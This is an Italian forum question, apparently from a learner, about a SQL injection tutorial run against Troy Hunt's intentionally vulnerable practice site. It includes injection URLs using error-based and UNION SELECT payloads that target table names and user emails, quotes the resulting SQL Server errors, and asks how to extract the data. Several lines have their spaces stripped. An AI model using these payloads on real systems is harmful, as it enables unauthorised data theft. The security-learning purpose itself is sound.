Sto seguendo il tutorial sull'iniezione di Pluralsight SQL. L'istruttore non ha scavalcato effettivamente i dati.
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'AND 1=(SELECT TOP 1 name from (SELECT top 1 name from sys.tables order by name) t order by name desc)--
Hoprovatoadeseguireleiniezionicome:
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'unionselectEmailFROMUserProfile--http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'unionselecttop1EmailFROMUserProfile--
Horicevutoquestoerrore:
TuttelequerycombinateutilizzandounoperatoreUNION,INTERSECToEXCEPTdevonoavereunnumerougualediespressionineirispettivielenchididestinazione.
QuindihopensatochefossegiustochelecolonnecorrispondesseroallaqueryCylinders=V12.Credochesarebbeunoodue.Cosìhocambiatolamiarichiestain:
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'UNIONSELECTEmail,FirstNameFROMUserProfile;
Horicevutoquestoerrore:
Impossibilerisolvereilconflittodiconfrontotra"Latin1_General_CI_AS" e "SQL_Latin1_General_CP1_CI_AS" nell'operazione UNION.
Come faccio ad estrarre i dati quando ho informazioni su tabelle e colonne?